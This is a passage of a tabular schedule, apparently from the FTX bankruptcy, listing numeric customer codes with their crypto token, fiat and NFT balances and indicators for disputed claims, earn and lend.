| 07437666 | | TRX[1294.68049251], USD[0.00] | Yes | |
| 07437670 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07437676 | | SOL[0] | | |
| 07437682 | | ALGO[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], LINK[0], MATIC[0], SHIB[1], SOL[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07437691 | | BTC[.0000675] | | |
| 07437692 | | BTC[0], CHF[0.00], DOGE[0], LINK[0], LTC[0], PAXG[0], UNI[0], USD[0.00] | | |
| 07437693 | | CUSDT[1], SOL[0], TRX[0], USD[0.00] | | |
| 07437695 | | BCH[0], DOGE[26.84221256], GRT[0], USD[0.00], USDT[0] | Yes | |
| 07437700 | | BAT[1], CUSDT[5], DOGE[35749.37856426], SHIB[11119857.91307927], SOL[37.79835539], USD[680.00] | | |
| 07437703 | | BTC[.00474154], USD[0.15] | Yes | |
| 07437704 | | SOL[.00223898], SUSHI[.45800531], USDT[0] | | |
| 07437714 | | DOGE[4651.76101066], SHIB[1713862.18676089], TRX[1], USD[0.00] | Yes | |
| 07437715 | | BTC[0], SOL[0] | | |
| 07437724 | | CUSDT[1], DOGE[1], ETH[.02138702], ETHW[.02138702], UNI[3.21702478], USD[50.00] | | |
| 07437730 | | BRZ[1], CUSDT[11], DOGE[3], TRX[1], USD[0.00] | Yes | |
| 07437731 | | USD[0.06] | | |
| 07437740 | | GRT[0], TRX[11.85677738], USD[0.06], USDT[0] | | |
| 07437747 | | BTC[0.00148292], ETH[0], SOL[0.35559668], UNI[.00000001], USD[0.00], USDT[0.00000011] | | |
| 07437765 | | CUSDT[13], DOGE[1], SHIB[3], SOL[1.54457477], USD[0.01] | Yes | |
| 07437768 | | BTC[0.00005990] | | |
| 07437772 | | USD[0.00], USDT[0.00000001] | | |
| 07437776 | | SOL[0], USD[0.00] | | |
| 07437791 | | DOGE[.00003552], USD[0.79] | | |
| 07437796 | | SOL[.00009756] | | |
| 07437798 | | SHIB[16676.7259733], USD[0.00], USDT[0] | Yes | |
| 07437802 | | BRZ[1], USD[0.01] | | |
| 07437803 | | BAT[9.64888839], BTC[.00011293], CUSDT[4], ETH[.00164191], ETHW[.00162822], MATIC[6.10292429], SUSHI[1.14653242], TRX[54.39906824], USD[5.35], USDT[8.04758567] | Yes | |
| 07437807 | | CUSDT[1], USD[0.00] | | |
| 07437812 | | BTC[0], DOGE[0.00006770], ETH[0], LTC[0], USD[0.00], YFI[0] | | |
| 07437813 | | BAT[1], CUSDT[5], DOGE[5], NFT (354065832239513937/Coachella x FTX Weekend 1 #10218)[1], SOL[0], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07437819 | | BTC[.000008] | | |
| 07437824 | | BTC[0], TRX[1], USD[0.36] | Yes | |
| 07437848 | | CUSDT[1], USD[0.00], USDT[0.00000001] | | |
| 07437852 | | BCH[0], DOGE[0], ETH[0.00000001], LINK[0], LTC[0], PAXG[0], SUSHI[0], TRX[0], USD[0.50], USDT[0] | | |
| 07437853 | | CUSDT[0], DOGE[0.15918002], GRT[4.10832622], SHIB[1], SOL[.01883346], TRX[18149.87415143], USD[0.00], USDT[0] | Yes | |
| 07437866 | | USD[20.00] | | |
| 07437867 | | USD[0.10] | | |
| 07437875 | | ETH[0], USD[1.19] | | |
| 07437883 | | BAT[4.2156977], BRZ[5.06538701], CUSDT[56.79159272], DOGE[14.88143049], ETH[6.77437833], ETHW[6.77154885], GRT[1.00429132], SOL[25.03188438], TRX[3], USD[0.00] | Yes | |
| 07437891 | | BTC[0], DOGE[0], LTC[0], SOL[0], USD[0.01] | | |
| 07437903 | | DOGE[0], LINK[.02485979], TRX[0], USD[0.14], USDT[0] | | |
| 07437905 | | USD[0.00], USDT[0.00000007] | | |
| 07437909 | | SOL[0], TRX[0], USD[0.00] | | |
| 07437913 | | BRZ[1], CUSDT[1394.48097406], DOGE[1], ETH[.01213661], ETHW[.01213661], TRX[416.13933444], USD[0.00] | | |
| 07437914 | | BAT[.00003125], DOGE[1], USD[0.00], YFI[.00000001] | Yes | |
| 07437923 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07437924 | | TRX[1], USD[0.00] | | |
| 07437927 | | BTC[.00008206], TRX[.000004], USDT[1.444708] | | |
| 07437936 | | USD[0.00] | Yes | |
| 07437939 | | TRX[7.638], USD[0.02] | | |
| 07437940 | | NFT (414360314992928047/Entrance Voucher #26616)[1] | | |
| 07437941 | | NFT (529664854561424067/Entrance Voucher #2410)[1], USD[0.01] | | |
| 07437944 | | DOGE[1], SHIB[2], USD[254.05] | | |
| 07437951 | | BRZ[2], CUSDT[9], SOL[3.45362675], TRX[6], USD[0.00], USDT[0] | Yes | |
| 07437952 | | BTC[0.00000099], ETH[.00024], ETHW[.00024], USDT[0] | | |
| 07437955 | | ETH[.04088691], ETHW[.04088691], USD[0.51] | | |
| 07437956 | | USD[10.00] | | |
| 07437968 | | USD[1.76] | | |
| 07437973 | | USD[0.00] | | |
| 07437979 | Contingent, Disputed | DOGE[0], USDT[0] | | |
| 07437982 | | BAT[1], BRZ[1], DOGE[1.0414985], USD[0.01] | | |
| 07437986 | | USD[0.00] | | |
| 07437990 | | DOGE[.7794], ETH[1.5909161], ETHW[1.5909161], SOL[67.84122], USD[0.00] | | |
| 07437991 | | USD[0.23] | Yes | |
| 07437994 | | CUSDT[1], DOGE[36.02061062], SOL[.03248876], USD[0.09] | | |
| 07437995 | | BCH[.00965991], CUSDT[469.88071069], DOGE[558.38973832], TRX[793.43694604], USD[0.00] | | |
| 07437999 | | USD[0.00], USDT[0] | | |
| 07438000 | | BTC[0.00000785], ETH[0], ETHW[0], SOL[121.94320000], USD[0.05] | | |
| 07438007 | | ETH[0], SOL[0] | | |
| 07438008 | | TRX[1], USD[0.00], USDT[19.89212282] | | |
| 07438011 | | CUSDT[2], DOGE[1], USD[0.01] | | |
| 07438015 | Contingent, Disputed | USD[6.22], USDT[0] | | |
| 07438016 | | USDT[5.421268] | | |
| 07438019 | | SOL[0], TRX[.146], USD[4.90], USDT[.9102194] | | |
| 07438021 | | BTC[.00218781], CUSDT[2], ETH[.02466463], ETHW[.0243625], NFT (450529413094181034/Coachella x FTX Weekend 1 #17751)[1], SHIB[2], SOL[3.48421092], USD[0.01] | Yes | |
| 07438023 | Contingent, Disputed | BTC[0.34117798] | | |
| 07438024 | | USD[0.00] | | |
| 07438025 | | NFT (308874626284495271/Entrance Voucher #24907)[1], NFT (428531959727322208/FTX - Off The Grid Miami #2526)[1] | | |
| 07438026 | | DOGE[.2082], USD[0.00], USDT[0] | | |
| 07438027 | | BAT[2.12893483], BRZ[2], CUSDT[2], DOGE[38.28974577], ETH[0], TRX[2], USD[3.89] | Yes | |
| 07438030 | | USD[0.00] | | |
| 07438041 | | BRZ[2], BTC[0], CUSDT[17], DOGE[1], ETH[0], ETHW[0], SHIB[2], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07438042 | | USD[0.02] | | |
| 07438043 | | BTC[0.01000000], USD[0.07] | | |
| 07438046 | | BRZ[1], BTC[.00117837], CUSDT[42], DOGE[927.79321687], KSHIB[617.99011857], MATIC[5.31800472], SHIB[1670653.09958218], SUSHI[1.88085945], TRX[223.16157182], USD[72.28], YFI[.00021366] | Yes | |
| 07438051 | | DOGE[2.70636701], SHIB[136.6741467], USD[0.00] | Yes | |
| 07438058 | | USD[24630.11], USDT[0.00000001] | | |
| 07438063 | | CUSDT[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07438065 | | CUSDT[2], SOL[2.94165101], TRX[1], USD[0.03] | | |
| 07438066 | | BTC[.00001298], SOL[.168] | | |
| 07438071 | | SOL[0] | | |
| 07438073 | | BTC[0], CUSDT[4], DOGE[1], ETH[0], ETHW[0], SHIB[1], SOL[0], TRX[1], USD[0.00] | | |
| 07438075 | | DAI[0], TRX[0], USD[0.05], USDT[0] | | |
| 07438079 | | USD[0.00] | | |
| 07438080 | | CUSDT[4], USD[0.00] | | |
| 07438081 | | CUSDT[6], DOGE[1.00110778], KSHIB[1550.90512574], NFT (35052886991508813/Crystal Face #4)[1], NFT (3623989922791356443/Magic Mushroom  #12)[1], NFT (44538643568566649/Magic Mushroom  #13)[1], NFT (53687831338097530/Panda#1)[1], NFT (56012066989323965/CatFamilya #58)[1], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07438084 | | CUSDT[2], USD[0.01] | | |
| 07438089 | | BF_POINT[200], DOGE[1], SOL[.7620469], USD[0.00] | | |
| 07438095 | | SUSHI[.1641007], USD[0.00] | | |
| 07438098 | | BTC[0], USD[0.00] | | |
| 07438103 | | CUSDT[2], DOGE[872.37763727], USD[0.00] | | |
| 07438106 | | USD[0.00] | | |
| 07438109 | | DOGE[2], USD[0.02], USDT[0] | | |
| 07438110 | | BTC[.0000147], ETH[.000522], ETHW[.000522], USD[0.00], USDT[0.00000001] | | |
| 07438111 | | ETH[.00050633], ETHW[0.00050633], SHIB[.00000008], SOL[0], USD[0.14], USDT[0] | | |
| 07438120 | | BTC[.00000139], DOGE[1], TRX[32.415476], USDT[0.05165355] | | |
| 07438121 | | TRX[.000004] | | |
| 07438124 | | ETH[0], USD[0.00] | | |
| 07438126 | | NFT (397180116052266824/Sigma Shark #5887)[1], USD[0.00], USDT[0] | | |
| 07438128 | | CUSDT[2], DOGE[160.84879418], USDT[0] | | |
| 07438132 | | DOGE[1], TRX[719.40812357] | | |
| 07438140 | | GRT[1.00286484], USD[0.65] | Yes | |
| 07438142 | | CUSDT[1], DOGE[967.28897221], SHIB[400769.4773966], SOL[1.0066258], TRX[1], USD[0.00] | | |
| 07438143 | | SOL[0], USD[0.00] | | |
| 07438147 | | CUSDT[1], DOGE[4.02330038], TRX[0], USD[0.00] | Yes | |
| 07438149 | | BTC[0], USD[0.04], USDT[0] | | |
| 07438151 | | BTC[.0000061], ETH[.002988], ETHW[.002988], USDT[.1930056] | | |
| 07438157 | | CUSDT[1], DOGE[.78548579], TRX[117.76732003], USD[-8.45], USDT[9.94506732] | | |
| 07438159 | | BTC[.000042], NFT (528993512830231006/Microphone #663)[1] | | |
| 07438160 | | BTC[0], DOGE[0], ETH[0], ETHW[6.08373759], SHIB[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07438162 | | BTC[0], ETH[.00000001], ETHW[0.00054549], LTC[0], SOL[0], USD[0.00], USDT[0.00150434] | | |
| 07438168 | | CUSDT[3], USD[0.01] | | |
| 07438169 | | USD[0.01], USDT[0] | | |
| 07438170 | | CUSDT[1], DOGE[56.29095161], USD[83.12] | Yes | |
| 07438173 | | USD[1.59], USDT[0] | | |
| 07438175 | | DOGE[149.43], SOL[.4970272], USD[13.84], USDT[0] | | |
| 07438181 | | BRZ[3], CUSDT[12], DOGE[17006.47279555], ETH[0.26027705], ETHW[0.26008189], GRT[2.02163373], LTC[1.15150417], TRX[60850.38099848], USD[0.00] | Yes | |
| 07438182 | | DOGE[2], TRX[3363.28097205], USD[0.00] | Yes | |
| 07438190 | | BCH[0], BTC[0], SOL[0], USD[0.00] | | |
| 07438191 | | USD[0.00] | | |
| 07438194 | | BTC[0], ETH[0], SOL[0], UNI[0], USD[0.00], USDT[0.00012065] | | |
| 07438195 | | USD[0.00] | | |
| 07438199 | | USD[0.50], USDT[0] | | |
| 07438212 | | BTC[.000056], TRX[.031978], USD[0.11], USDT[0.21188960] | | |
| 07438214 | | BRZ[2], BTC[0], CUSDT[5], DOGE[6.00131523], ETH[0], ETHW[0], NFT (297829270413073367/Magic Eden Pass)[1], SOL[61.54076846], TRX[3], USD[0.00] | Yes | |
| 07438218 | | SOL[5.29470000], USD[2.33] | | |
| 07438221 | | BTC[.00024122] | | |
| 07438222 | | BTC[0], CUSDT[5], TRX[0], USD[0.00] | | |
| 07438228 | | CUSDT[1], DOGE[312.12985301], USD[0.00] | | |
| 07438229 | | BTC[.00112849], CUSDT[8], DOGE[13.0409042], ETH[.0727762], ETHW[.0721954], GRT[27.67911755], TRX[1], USD[113.66] | Yes | |
| 07438230 | | CUSDT[1], TRX[0], USD[0.00] | | |
| 07438233 | | DOGE[14.62665012], TRX[1], USD[5.00] | | |
| 07438235 | | USDT[2976.327372] | | |
| 07438236 | | SOL[.996], USD[0.38] | | |
| 07438249 | | ETH[0.52474681], ETHW[0.52474681], USD[0.30] | | |
| 07438255 | | DOGE[1], NFT (418760884547443585/Son Goku & Mico: Draw Blade)[1], NFT (52602412619016867/Wood #5)[1], SOL[0], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07438263 | | BAT[1], SOL[0], USD[1.29], USDT[0] | | |
| 07438264 | | TRX[919.94070029], USD[20.00] | | |
| 07438268 | | USD[5.23] | | |
| 07438269 | | BRZ[1], CUSDT[8], GRT[1], SHIB[1], TRX[1], USD[12.81] | | |
| 07438271 | | ETHW[18.759], TRX[.000001], USD[0.00], USDT[9.0077934] | | |
| 07438274 | | BAT[64.39076727], BRZ[1], CUSDT[4696.48083971], DOGE[3891.66077394], TRX[613.05751805], USD[0.00] | | |
| 07438276 | | CUSDT[10412.31308757], DOGE[942.40613078], TRX[5576.39041444], USD[0.06] | Yes | |
| 07438277 | | BRZ[31.8650992], BTC[0], CUSDT[8], DOGE[3], ETH[.11175818], ETHW[.11064923], LTC[3.7980537], MATIC[38.61596306], SOL[3.21647753], SUSHI[27.55534204], TRX[67.69655258], USD[0.01] | Yes | |
| 07438285 | | BAT[1], GRT[1], LINK[1], SOL[2566.18630462], TRX[1], UNI[2], USD[0.00] | | |
| 07438286 | | USD[735.08] | | |
| 07438287 | | SHIB[1], TRX[238.79085798], USD[0.00] | Yes | |
| 07438288 | | CUSDT[1], DOGE[774.17144566], TRX[413.88960537], USD[0.00] | | |
| 07438289 | | LINK[4.1958], SOL[40.6], USD[1.97] | | |
| 07438296 | | BRZ[5.58604886], DOGE[7.66796289], ETH[.00104089], ETHW[.00104089], TRX[21.66980589], USD[0.00] | | |
| 07438297 | | NEAR[35.7], SOL[0], USD[81.81] | | |
| 07438300 | | USD[19.87] | | |
| 07438301 | | USDT[0.25621920] | | |
| 07438307 | | DOGE[0], ETH[0], ETHW[0], MATIC[62.70594328], SHIB[0], USD[0.00] | | |